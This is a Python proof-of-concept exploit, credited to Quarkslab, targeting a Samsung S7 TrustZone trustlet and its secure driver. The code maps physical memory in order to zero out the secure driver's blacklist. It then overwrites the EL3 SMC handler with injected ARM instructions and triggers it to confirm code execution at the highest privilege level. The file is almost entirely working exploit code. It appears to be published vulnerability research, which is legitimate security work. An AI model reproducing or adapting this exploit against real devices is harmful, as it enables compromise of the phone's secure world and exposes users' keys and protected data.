# teeos.py: Proof of concept exploit for Samsung S7 trustlet.
# Copyright (C) 2019-2020 Quarkslab SAS.
#
#    This program is free software: you can redistribute it and/or modify
#    it under the terms of the GNU General Public License as published by
#    the Free Software Foundation, either version 3 of the License, or
#    (at your option) any later version.
#
#    This program is distributed in the hope that it will be useful,
#    but WITHOUT ANY WARRANTY; without even the implied warranty of
#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#    GNU General Public License for more details.
#
#    You should have received a copy of the GNU General Public License
#    along with this program.  If not, see <https://www.gnu.org/licenses/
#
#
#
from .secdriver import *

from mcclient import *


def main():
    #--------------------------------------------------------------------------
    # 1. Removing the Blacklist
    blacklist_page_pa = 0xfe512000
    blacklist_page_va = 0x40000
    blacklist_offset = 0x440
    zeroes_buffer_offset = 0x1000
    zeroes_buffer_addr = TCI_DR_BUFFER_ADDRESS + zeroes_buffer_offset
    zeroes_buffer_size = 0x100

    with TrustletInterface() as tl_if:
        with SecDriverInterface(tl_if) as dr_if:
            dr_if.tci.seek(zeroes_buffer_offset)
            dr_if.tci.write(b'\x00'*zeroes_buffer_size)
            dr_if.tci.seek(0)
            dr_if.execute_code(
                # Mapping the blacklit
                SecDriverPayload.svc_mmap(
                    physical_addr_low=blacklist_page_pa,
                    virtual_addr=blacklist_page_va,
                    length=0x1000,
                    attr=0x103,
                ),
                # Zeroing out the blacklist
                SecDriverPayload.memcpy(
                    blacklist_page_va + blacklist_offset,
                    zeroes_buffer_addr,
                    zeroes_buffer_size
                ),
                # Restore the secure driver state
                SecDriverPayload.call_notify_and_wait()
            )
    #--------------------------------------------------------------------------

    #--------------------------------------------------------------------------
    # 2. SMC Handler Hijacking
    smc_page_pa = 0x2030000
    smc_page_va = 0x41000
    smc_offset = 0x524
    smc_id = 0x820000F2
    smc_registers_offset = 0x2000
    smc_registers_addr = TCI_DR_BUFFER_ADDRESS + smc_registers_offset
    instructions = "\x40\x42\x38\xd5\xc0\x03\x5f\xd6" # MRS X0, CurrentEL; RET;
    instructions_buffer_offset = 0x1000
    instructions_buffer_addr = TCI_BUFFER_ADDR + instructions_buffer_offset

    with TrustletInterface() as tl_if:
        with SecDriverInterface(tl_if) as dr_if:
            # Writing the SMC registers in the TCI buffer mapped in the
            # secure driver address space
            # The address of the buffer holding these values will be passed
            # as arguments to `drApiSMC` called by `svc_smc` below
            dr_if.tci.seek(smc_registers_offset)
            dr_if.tci.write_dword(smc_id)

            # Copying the assembly to execute in the SMC into the TCI buffer
            dr_if.tci.seek(instructions_buffer_offset)
            dr_if.tci.write(instructions)

            # Code execution in the Secure Driver
            dr_if.tci.seek(0)
            dr_if.execute_code(
                # Mapping the SMC handler in the Secure Driver address space
                SecDriverPayload.svc_mmap(
                    physical_addr_low=smc_page_pa,
                    virtual_addr=smc_page_va,
                    length=0x1000,
                    attr=0x103,
                ),
                # Hijacking the SMC
                SecDriverPayload.memcpy(
                    smc_page_va + smc_offset,
                    instructions_buffer_addr,
                    len(instructions)
                ),
                # Call to drApiSMC
                SecDriverPayload.svc_smc(smc_registers_addr),
                # Restore the secure driver state
                SecDriverPayload.call_notify_and_wait()
            )

            # Reading the return value
            dr_if.tci.seek(smc_registers_offset)
            retval = dr_if.tci.read_dword()
            print(hex(retval >> 2))
    #--------------------------------------------------------------------------


if __name__ == '__main__':
    main()
